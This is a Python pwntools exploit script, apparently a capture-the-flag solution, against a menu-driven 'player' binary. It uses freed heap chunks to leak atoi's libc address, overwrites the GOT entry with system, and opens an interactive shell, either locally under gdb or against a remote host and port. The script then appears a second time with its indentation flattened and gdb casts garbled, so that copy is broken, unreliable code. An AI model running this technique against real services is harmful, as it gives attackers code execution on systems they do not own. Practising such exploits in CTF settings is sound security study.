dqi/sploit.py

## sploit.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *

context.terminal = ['mate-terminal','-e']
gdbargs = """
add-symbol-file p_struct.o 0
b show_player
commands
telescope &selected 13
heap
p *((struct player_struct*)*(&selected+0))
p *((struct player_struct*)*(&players+0))
c
end
b edit_player
c
"""


def add_player(r, name, a, d, s, p):
    r.sendline('1')
    r.sendline(name)
    r.sendline(str(a))
    r.sendline(str(d))
    r.sendline(str(s))
    r.sendline(str(p))
    r.recvuntil('choice: ')


def remove_player(r, idx):
    r.sendline('2')
    r.sendline(str(idx))
    r.recvuntil('choice: ')


def select_player(r, idx):
    r.sendline('3')
    r.sendline(str(idx))
    r.recvuntil('choice: ')


def edit_player(r, what, to):
    r.sendline('4')
    r.sendline(str(what))
    r.sendline(to)
    r.recvuntil('choice: ')


def exploit(r):
    atoi_got = 0x603110

    add_player(r, cyclic(114), 1, 2, 3, 4)
    add_player(r, cyclic(128), 5, 6, 7, 8)
    add_player(r, cyclic(128), 9, 10, 11, 12)
    select_player(r, 0)
    remove_player(r, 0)
    remove_player(r, 1)
    remove_player(r, 2)
    add_player(r, cyclic(16) + p64(atoi_got), 9, 10, 11, 12)
    r.sendline('5')
    r.recvuntil('Name: ')
    data = r.recvline().strip()[::-1]
    atoi_addr = int(data.encode('hex'), 16)
    log.success('atoi@libc: 0x%08x' % atoi_addr)
    atoi = 0x00036e80
    system = 0x00045390

#     atoi = 0x00034b30
#     system = 0x00040dd0

    system_addr = atoi_addr + (system - atoi)
    edit_player(r, 1, p64(system_addr))
    log.success('wrote system to got 0x%08x: 0x%08x' % (atoi_got, system_addr))
    r.recvuntil('choice: ')
    r.recvuntil('choice: ')
    r.sendline('sh')

    log.success('Enjoy the shell!')
    r.interactive()


if __name__ == "__main__":
    if len(sys.argv) > 1:
        log.info("REMOTE!\nHost: %s\nPort: %d" % (sys.argv[1], int(sys.argv[2])))
        r = remote(sys.argv[1], int(sys.argv[2]))
        exploit(r)
    else:
        r = gdb.debug(['./main_patched'], gdbargs, exe='main_patched')
        # r = process(['./main_patched'])
        print util.proc.pidof(r)
        exploit(r)
	#!/usr/bin/env python
	# -- coding: utf-8 --

	from pwn import *

	context.terminal = ['mate-terminal','-e']
	gdbargs = """
	add-symbol-file p_struct.o 0
	b show_player
	commands
	telescope &selected 13
	heap
	p ((struct player_struct)*(&selected+0))
	p ((struct player_struct)*(&players+0))
	c
	end
	b edit_player
	c
	"""


	def add_player(r, name, a, d, s, p):
	r.sendline('1')
	r.sendline(name)
	r.sendline(str(a))
	r.sendline(str(d))
	r.sendline(str(s))
	r.sendline(str(p))
	r.recvuntil('choice: ')


	def remove_player(r, idx):
	r.sendline('2')
	r.sendline(str(idx))
	r.recvuntil('choice: ')


	def select_player(r, idx):
	r.sendline('3')
	r.sendline(str(idx))
	r.recvuntil('choice: ')


	def edit_player(r, what, to):
	r.sendline('4')
	r.sendline(str(what))
	r.sendline(to)
	r.recvuntil('choice: ')


	def exploit(r):
	atoi_got = 0x603110

	add_player(r, cyclic(114), 1, 2, 3, 4)
	add_player(r, cyclic(128), 5, 6, 7, 8)
	add_player(r, cyclic(128), 9, 10, 11, 12)
	select_player(r, 0)
	remove_player(r, 0)
	remove_player(r, 1)
	remove_player(r, 2)
	add_player(r, cyclic(16) + p64(atoi_got), 9, 10, 11, 12)
	r.sendline('5')
	r.recvuntil('Name: ')
	data = r.recvline().strip()[::-1]
	atoi_addr = int(data.encode('hex'), 16)
	log.success('atoi@libc: 0x%08x' % atoi_addr)
	atoi = 0x00036e80
	system = 0x00045390

	# atoi = 0x00034b30
	# system = 0x00040dd0

	system_addr = atoi_addr + (system - atoi)
	edit_player(r, 1, p64(system_addr))
	log.success('wrote system to got 0x%08x: 0x%08x' % (atoi_got, system_addr))
	r.recvuntil('choice: ')
	r.recvuntil('choice: ')
	r.sendline('sh')

	log.success('Enjoy the shell!')
	r.interactive()


	if __name__ == "__main__":
	if len(sys.argv) > 1:
	log.info("REMOTE!\nHost: %s\nPort: %d" % (sys.argv[1], int(sys.argv[2])))
	r = remote(sys.argv[1], int(sys.argv[2]))
	exploit(r)
	else:
	r = gdb.debug(['./main_patched'], gdbargs, exe='main_patched')
	# r = process(['./main_patched'])
	print util.proc.pidof(r)
	exploit(r)